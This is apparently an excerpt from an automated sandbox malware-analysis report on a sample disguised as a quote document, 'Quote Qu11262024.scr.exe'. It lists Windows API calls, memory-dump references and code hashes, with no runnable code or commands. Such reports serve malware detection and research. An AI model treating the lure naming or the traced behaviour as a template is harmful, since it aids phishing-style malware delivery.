                                                                                                    Similarity
                                                                                                    • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                    • String ID:
                                                                                                    • API String ID: 336800556-0
                                                                                                    • Opcode ID: 199bf032206d23b44823c4abca3549b19003d8a11fc2f1b44f0ffbe23420c85a
                                                                                                    • Instruction ID: 84a180bbcf0e748ef9b080616ee071ed051a6aefd9a15f3b2ad1723fb10b6654
                                                                                                    • Opcode Fuzzy Hash: 199bf032206d23b44823c4abca3549b19003d8a11fc2f1b44f0ffbe23420c85a
                                                                                                    • Instruction Fuzzy Hash: 5A01A7B76012157F27130AB69C8CD7B6A7EDFC6EB1751012DBD04E7204EF649C0282B1
                                                                                                    APIs
                                                                                                    • GetLastError.KERNEL32(00000000,?,00000000,3714636D,37145713,00000000,?,37142249,?,?,37141D66,00000000,?,?,00000000), ref: 37145B7F
                                                                                                    • _free.LIBCMT ref: 37145BB4
                                                                                                    • _free.LIBCMT ref: 37145BDB
                                                                                                    • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 37145BE8
                                                                                                    • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 37145BF1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.4635689631.0000000037141000.00000040.00001000.00020000.00000000.sdmp, Offset: 37140000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.4635673088.0000000037140000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.4635689631.0000000037156000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_37140000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$_free
                                                                                                    • String ID:
                                                                                                    • API String ID: 3170660625-0
                                                                                                    • Opcode ID: 23d9a1c9546ca3e0f64979cc9c72469b27cbabd67b83a02b5225124ca85c3523
                                                                                                    • Instruction ID: 3673706d884cfb353c77cbbdecb968791ece4ea5b0c685b54ef4960e06947224
                                                                                                    • Opcode Fuzzy Hash: 23d9a1c9546ca3e0f64979cc9c72469b27cbabd67b83a02b5225124ca85c3523
                                                                                                    • Instruction Fuzzy Hash: D701287B144B01A7A3031634DC85E1F2A3B9BC55B57A20028FE16F3249FF3DCA134225
                                                                                                    APIs
                                                                                                    • GetDC.USER32(?), ref: 00401D9E
                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DB8
                                                                                                    • MulDiv.KERNEL32(00000000,00000000), ref: 00401DC0
                                                                                                    • ReleaseDC.USER32(?,00000000), ref: 00401DD1
                                                                                                    • CreateFontIndirectA.GDI32(0040B800), ref: 00401E20
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.4604206586.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.4604186321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.4605360249.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.4605386033.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.4605408589.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                    • String ID:
                                                                                                    • API String ID: 3808545654-0
                                                                                                    • Opcode ID: 3c25a8c7844bb53b9a4bc171c4fea22a0d9e5e9376405d6521ad0d6b887a041d
                                                                                                    • Instruction ID: 810937ae9080f590f54b77349243ed1ca62fcdae25a9dc42187aa6aa1688f7d7
                                                                                                    • Opcode Fuzzy Hash: 3c25a8c7844bb53b9a4bc171c4fea22a0d9e5e9376405d6521ad0d6b887a041d
                                                                                                    • Instruction Fuzzy Hash: FB014472945244AFE7006BB0AE49B9A3FF8EB55305F148839F141B62F2CB7905458B6D
                                                                                                    APIs
                                                                                                    • lstrlenW.KERNEL32(?,?,?,?,?,371410DF,?,?,?,00000000), ref: 37141E9A
                                                                                                    • lstrcatW.KERNEL32(?,?,?,371410DF,?,?,?,00000000), ref: 37141EAC
                                                                                                    • lstrlenW.KERNEL32(?,?,371410DF,?,?,?,00000000), ref: 37141EB3
                                                                                                    • lstrlenW.KERNEL32(?,?,371410DF,?,?,?,00000000), ref: 37141EC8
                                                                                                    • lstrcatW.KERNEL32(?,371410DF,?,371410DF,?,?,?,00000000), ref: 37141ED3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.4635689631.0000000037141000.00000040.00001000.00020000.00000000.sdmp, Offset: 37140000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.4635673088.0000000037140000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.4635689631.0000000037156000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_37140000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: lstrlen$lstrcat
                                                                                                    • String ID:
                                                                                                    • API String ID: 493641738-0
                                                                                                    • Opcode ID: 2c9166e40d901cd012b4ae2f6f240dd4e678cb56a6269a4e72cdd18ae02c193f
                                                                                                    • Instruction ID: 26c03363542e68d3cbe221c456e30ab8c90732294baa699fd636a1d780cba548
                                                                                                    • Opcode Fuzzy Hash: 2c9166e40d901cd012b4ae2f6f240dd4e678cb56a6269a4e72cdd18ae02c193f
                                                                                                    • Instruction Fuzzy Hash: C2F0547B1401107AD723271AEC89E7F777CEF85B60F840019F608A3190DB59685393A5
                                                                                                    APIs
                                                                                                    • _free.LIBCMT ref: 371491D0
                                                                                                      • Part of subcall function 3714571E: HeapFree.KERNEL32(00000000,00000000,?,3714924F,?,00000000,?,00000000,?,37149276,?,00000007,?,?,37147E5A,?), ref: 37145734
                                                                                                      • Part of subcall function 3714571E: GetLastError.KERNEL32(?,?,3714924F,?,00000000,?,00000000,?,37149276,?,00000007,?,?,37147E5A,?,?), ref: 37145746
                                                                                                    • _free.LIBCMT ref: 371491E2
                                                                                                    • _free.LIBCMT ref: 371491F4
                                                                                                    • _free.LIBCMT ref: 37149206
                                                                                                    • _free.LIBCMT ref: 37149218
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.4635689631.0000000037141000.00000040.00001000.00020000.00000000.sdmp, Offset: 37140000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.4635673088.0000000037140000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.4635689631.0000000037156000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_37140000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 776569668-0
                                                                                                    • Opcode ID: 420e354428bc2661e149fb4f984d5adca153b7fe10fb2bda4ab014a9dcc74b02
                                                                                                    • Instruction ID: 1ff6000547168fd22ee0fa433fef35fcb51a7c77af05f9050cd5f76fafde4dcc
                                                                                                    • Opcode Fuzzy Hash: 420e354428bc2661e149fb4f984d5adca153b7fe10fb2bda4ab014a9dcc74b02
                                                                                                    • Instruction Fuzzy Hash: 44F049F79582409BC615DA58E6C6C0ABBFBFB456363E10805E809E7604CF28F8908A60
                                                                                                    APIs
                                                                                                    • GetDlgItem.USER32(?), ref: 00401D45
                                                                                                    • GetClientRect.USER32(00000000,?), ref: 00401D52
                                                                                                    • LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401D73
                                                                                                    • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D81
                                                                                                    • DeleteObject.GDI32(00000000), ref: 00401D90
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.4604206586.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.4604186321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.4605360249.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.4605386033.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.4605408589.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                    • String ID:
                                                                                                    • API String ID: 1849352358-0
                                                                                                    • Opcode ID: e823691931fea709f1b515e5775660d8fda913d97b2be414345e1a1dd024040a
                                                                                                    • Instruction ID: a13b5a5d39b080b734a87188ea61078e2d8a06182c0907a8ae2338f0aa50a120
                                                                                                    • Opcode Fuzzy Hash: e823691931fea709f1b515e5775660d8fda913d97b2be414345e1a1dd024040a
                                                                                                    • Instruction Fuzzy Hash: B4F0ECB2600515AFDB00ABA4DE89DAEB7BCEB44305B04446AF641F2191CA748D018B38
                                                                                                    APIs
                                                                                                    • _free.LIBCMT ref: 3714536F
                                                                                                      • Part of subcall function 3714571E: HeapFree.KERNEL32(00000000,00000000,?,3714924F,?,00000000,?,00000000,?,37149276,?,00000007,?,?,37147E5A,?), ref: 37145734
                                                                                                      • Part of subcall function 3714571E: GetLastError.KERNEL32(?,?,3714924F,?,00000000,?,00000000,?,37149276,?,00000007,?,?,37147E5A,?,?), ref: 37145746
                                                                                                    • _free.LIBCMT ref: 37145381
                                                                                                    • _free.LIBCMT ref: 37145394
                                                                                                    • _free.LIBCMT ref: 371453A5
                                                                                                    • _free.LIBCMT ref: 371453B6
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.4635689631.0000000037141000.00000040.00001000.00020000.00000000.sdmp, Offset: 37140000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.4635673088.0000000037140000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.4635689631.0000000037156000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_37140000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 776569668-0
                                                                                                    • Opcode ID: c6934d90ed816ead4b75c84955e6e36de1fb970413d68fc957d3f99400c6b61f
                                                                                                    • Instruction ID: 83e2ec06e2b128189d791482f905ef552ce21b9ad173538a939351aca71b1bf0
                                                                                                    • Opcode Fuzzy Hash: c6934d90ed816ead4b75c84955e6e36de1fb970413d68fc957d3f99400c6b61f
                                                                                                    • Instruction Fuzzy Hash: 2EF03A738A4120DB8B0A5F24D9824083FB2B78C7793D1015AF810B7358DF3D1523EB82
                                                                                                    APIs
                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\Quote Qu11262024.scr.exe,00000104), ref: 37144C1D
                                                                                                    • _free.LIBCMT ref: 37144CE8
                                                                                                    • _free.LIBCMT ref: 37144CF2
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.4635689631.0000000037141000.00000040.00001000.00020000.00000000.sdmp, Offset: 37140000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.4635673088.0000000037140000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.4635689631.0000000037156000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_37140000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _free$FileModuleName
                                                                                                    • String ID: C:\Users\user\Desktop\Quote Qu11262024.scr.exe
                                                                                                    • API String ID: 2506810119-715597695
                                                                                                    • Opcode ID: 1b559ff3ffe755ff18ac8031433c8714436f8ab9346355487278c0f16c81706a
                                                                                                    • Instruction ID: e717829d0cc19e8a5312064d6afd7d3e6cbc950cf36c84433e8237bd8f331a46
                                                                                                    • Opcode Fuzzy Hash: 1b559ff3ffe755ff18ac8031433c8714436f8ab9346355487278c0f16c81706a
                                                                                                    • Instruction Fuzzy Hash: C631D8B3A50318EFDB22CF99C881E9EBBFDEB89324F144056EC04A7200DB749A41DB51
                                                                                                    APIs
                                                                                                    • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C7A
                                                                                                    • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C92
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.4604206586.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.4604186321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.4605360249.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.4605386033.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.4605408589.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$Timeout
                                                                                                    • String ID: !
                                                                                                    • API String ID: 1777923405-2657877971
                                                                                                    • Opcode ID: c8db4ef1de0b1788a349db4a13c6c599e165c4425c0ff8e4c3c4ec4ea7b9bfbf
                                                                                                    • Instruction ID: c3250d5c980cd670a2c14b5a4ff2ab463f1fff6c58a752f95a7fb09de1d44ebe
                                                                                                    • Opcode Fuzzy Hash: c8db4ef1de0b1788a349db4a13c6c599e165c4425c0ff8e4c3c4ec4ea7b9bfbf
                                                                                                    • Instruction Fuzzy Hash: 1521A271E44209BEEF15DFA5D986AAD7BB4EF84304F24843EF501B61D0CB7885418F28
                                                                                                    APIs
                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,37146FFD,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 37148731
                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 371487BA
                                                                                                    • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 371487CC
                                                                                                    • __freea.LIBCMT ref: 371487D5
                                                                                                      • Part of subcall function 371456D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 37145702
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.4635689631.0000000037141000.00000040.00001000.00020000.00000000.sdmp, Offset: 37140000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.4635673088.0000000037140000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.4635689631.0000000037156000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_37140000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                    • String ID:
                                                                                                    • API String ID: 2652629310-0
                                                                                                    • Opcode ID: 18a622d81715a5dcf09d7a089bead8521c021b72e44041f5b7433fbc4e443f0d
                                                                                                    • Instruction ID: 3b2ec2efda88e671fc229317dec87ff9568959a9115c7d4ae703edaa977b960d
                                                                                                    • Opcode Fuzzy Hash: 18a622d81715a5dcf09d7a089bead8521c021b72e44041f5b7433fbc4e443f0d
                                                                                                    • Instruction Fuzzy Hash: 1A31E377A0020AABDF168F64CC95DAF7BB6EB44321F410128EC04E7150E779D891DB90
                                                                                                    APIs
                                                                                                    • GetModuleHandleA.KERNEL32(00000000,00000001,000000F0), ref: 0040202E
                                                                                                      • Part of subcall function 004051FB: lstrlenA.KERNEL32(00420510,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D8B,00000000,?), ref: 00405234
                                                                                                      • Part of subcall function 004051FB: lstrlenA.KERNEL32(00402D8B,00420510,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D8B,00000000), ref: 00405244
                                                                                                      • Part of subcall function 004051FB: lstrcatA.KERNEL32(00420510,00402D8B,00402D8B,00420510,00000000,00000000,00000000), ref: 00405257
                                                                                                      • Part of subcall function 004051FB: SetWindowTextA.USER32(00420510,00420510), ref: 00405269
                                                                                                      • Part of subcall function 004051FB: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040528F
                                                                                                      • Part of subcall function 004051FB: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004052A9
                                                                                                      • Part of subcall function 004051FB: SendMessageA.USER32(?,00001013,?,00000000), ref: 004052B7
                                                                                                    • LoadLibraryExA.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040203E
                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 0040204E
                                                                                                    • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 004020B8
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.4604206586.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.4604186321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.4605360249.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.4605386033.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.4605408589.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                                                                    • String ID:
                                                                                                    • API String ID: 2987980305-0
                                                                                                    • Opcode ID: 5f92502e27dcc5e883f900cd32a38d9279d1d0fc147d99b0563f4f8b79b7ad73
                                                                                                    • Instruction ID: bf6ce38583783c4e047e41a390d947aca960f525c748a6aadb1ef99b00404d37
                                                                                                    • Opcode Fuzzy Hash: 5f92502e27dcc5e883f900cd32a38d9279d1d0fc147d99b0563f4f8b79b7ad73
                                                                                                    • Instruction Fuzzy Hash: E121D872A00225A7CF207FA5CE4DBAE76A0AF40358F71413BF611B21D0CBBD4942966E
                                                                                                    APIs
                                                                                                    • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402C32
                                                                                                    • RegCloseKey.ADVAPI32(?,?,?), ref: 00402C3B
                                                                                                    • RegCloseKey.ADVAPI32(?,?,?), ref: 00402C5C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.4604206586.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.4604186321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.4605360249.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.4605386033.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.4605408589.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Close$Enum
                                                                                                    • String ID:
                                                                                                    • API String ID: 464197530-0
                                                                                                    • Opcode ID: 2f19832255edef4eaba0d9f93933e35f28884cffcedead92015bf587d4129b42
                                                                                                    • Instruction ID: effd60b5220b711b9c6c3ccd9c1d0aa654771920be3fafa65f8b7d02a25fd7fc
                                                                                                    • Opcode Fuzzy Hash: 2f19832255edef4eaba0d9f93933e35f28884cffcedead92015bf587d4129b42
                                                                                                    • Instruction Fuzzy Hash: 9B115B32504109FBEF129F90CF09F9E7B79AB04340F104032BD45B51E0D7B59E11AA98
                                                                                                    APIs
                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,37141D66,00000000,00000000,?,37145C88,37141D66,00000000,00000000,00000000,?,37145E85,00000006,FlsSetValue), ref: 37145D13
                                                                                                    • GetLastError.KERNEL32(?,37145C88,37141D66,00000000,00000000,00000000,?,37145E85,00000006,FlsSetValue,3714E190,FlsSetValue,00000000,00000364,?,37145BC8), ref: 37145D1F
                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,37145C88,37141D66,00000000,00000000,00000000,?,37145E85,00000006,FlsSetValue,3714E190,FlsSetValue,00000000), ref: 37145D2D
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.4635689631.0000000037141000.00000040.00001000.00020000.00000000.sdmp, Offset: 37140000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.4635673088.0000000037140000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.4635689631.0000000037156000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_37140000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: LibraryLoad$ErrorLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 3177248105-0
                                                                                                    • Opcode ID: b265a2ee6d40791f8253a67a6d46b2a5c0149877d11d67d4b59c03dcc3f6b4e9
                                                                                                    • Instruction ID: da47999a4cd7125952404d6ed37745d8f06b375a7f537842305db623b52db89f
                                                                                                    • Opcode Fuzzy Hash: b265a2ee6d40791f8253a67a6d46b2a5c0149877d11d67d4b59c03dcc3f6b4e9
                                                                                                    • Instruction Fuzzy Hash: 420128372413266BDF234A28CC4DA463778AF057F0B520620FA15F7244CF24D412CBD0
                                                                                                    APIs
                                                                                                    • CreateDirectoryA.KERNEL32(?,?,0042B400), ref: 00405704
                                                                                                    • GetLastError.KERNEL32 ref: 00405718
                                                                                                    • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 0040572D
                                                                                                    • GetLastError.KERNEL32 ref: 00405737
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.4604206586.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.4604186321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.4605360249.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.4605386033.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.4605408589.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                    • String ID:
                                                                                                    • API String ID: 3449924974-0
                                                                                                    • Opcode ID: b585f5161d807d3f0f7c483c76382efe3a1db6be34ae0fb1d35030ff25d5446d
                                                                                                    • Instruction ID: 1519484df5af4c351f4ba2731212b7ab5e92ba1244ff1540d6ffe77672abb3e3
                                                                                                    • Opcode Fuzzy Hash: b585f5161d807d3f0f7c483c76382efe3a1db6be34ae0fb1d35030ff25d5446d
                                                                                                    • Instruction Fuzzy Hash: A3011671D10219EADF10DFA5C904BEFBBB8EF14314F00803AD944B6280E7B89608DFA9
                                                                                                    APIs
                                                                                                    • _free.LIBCMT ref: 3714655C
                                                                                                      • Part of subcall function 371462BC: IsProcessorFeaturePresent.KERNEL32(00000017,371462AB,00000000,?,?,?,?,00000016,?,?,371462B8,00000000,00000000,00000000,00000000,00000000), ref: 371462BE
                                                                                                      • Part of subcall function 371462BC: GetCurrentProcess.KERNEL32(C0000417), ref: 371462E0
                                                                                                      • Part of subcall function 371462BC: TerminateProcess.KERNEL32(00000000), ref: 371462E7
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.4635689631.0000000037141000.00000040.00001000.00020000.00000000.sdmp, Offset: 37140000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.4635673088.0000000037140000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.4635689631.0000000037156000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_37140000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                                                                    • String ID: *?$.
                                                                                                    • API String ID: 2667617558-3972193922
                                                                                                    • Opcode ID: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                                                                                    • Instruction ID: bcab111adac256817537d75c3c1b9e12781b315577b997e57a64b694a360e0f3
                                                                                                    • Opcode Fuzzy Hash: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                                                                                    • Instruction Fuzzy Hash: C2518076E10209EFDF05CFA8C880BADBBB5EF48368F248169D854EB344E7759A018B50
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.4635689631.0000000037141000.00000040.00001000.00020000.00000000.sdmp, Offset: 37140000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.4635673088.0000000037140000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.4635689631.0000000037156000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_37140000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _strlen
                                                                                                    • String ID: : $Se.
                                                                                                    • API String ID: 4218353326-4089948878
                                                                                                    • Opcode ID: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                                                    • Instruction ID: 709fa542f2c11e2edba7a32373accbd7983c4e2dcbe7a37f99b3df535cb87948
                                                                                                    • Opcode Fuzzy Hash: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                                                    • Instruction Fuzzy Hash: 7A110676900288AEDB11CFA8D840BDEFBFDEF19214F10405AE945EB212E7745B02D7A5
                                                                                                    APIs
                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 37142903
                                                                                                      • Part of subcall function 371435D2: RaiseException.KERNEL32(?,?,?,37142925,00000000,00000000,00000000,?,?,?,?,?,37142925,?,371521B8), ref: 37143632
                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 37142920
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.4635689631.0000000037141000.00000040.00001000.00020000.00000000.sdmp, Offset: 37140000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.4635673088.0000000037140000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.4635689631.0000000037156000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_37140000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Exception@8Throw$ExceptionRaise
                                                                                                    • String ID: Unknown exception
                                                                                                    • API String ID: 3476068407-410509341
                                                                                                    • Opcode ID: f06cbb6e09b592da79439387fa0e00a2b1bf7452871c88e51aa81ce498883ec1
                                                                                                    • Instruction ID: 83b224eed5134aa6a07ad6786b850af7d3d5985d40b5ed8f01ab4c622193168e
                                                                                                    • Opcode Fuzzy Hash: f06cbb6e09b592da79439387fa0e00a2b1bf7452871c88e51aa81ce498883ec1
                                                                                                    • Instruction Fuzzy Hash: EEF0F47B90030D739B04A6A4EC45A6EF7BD6F00660F908170A925E6490EF35F997C592
                                                                                                    APIs
                                                                                                      • Part of subcall function 004060D4: lstrcpynA.KERNEL32(?,?,00000400,004033FA,00423F20,NSIS Error,?,00000006,00000008,0000000A), ref: 004060E1
                                                                                                      • Part of subcall function 00405B05: CharNextA.USER32(?,?,00422138,?,00405B71,00422138,00422138,76233410,?,76232EE0,004058BC,?,76233410,76232EE0,00000000), ref: 00405B13
                                                                                                      • Part of subcall function 00405B05: CharNextA.USER32(00000000), ref: 00405B18
                                                                                                      • Part of subcall function 00405B05: CharNextA.USER32(00000000), ref: 00405B2C
                                                                                                    • lstrlenA.KERNEL32(00422138,00000000,00422138,00422138,76233410,?,76232EE0,004058BC,?,76233410,76232EE0,00000000), ref: 00405BAD
                                                                                                    • GetFileAttributesA.KERNEL32(00422138,00422138,00422138,00422138,00422138,00422138,00000000,00422138,00422138,76233410,?,76232EE0,004058BC,?,76233410,76232EE0), ref: 00405BBD
                                                                                                    Strings
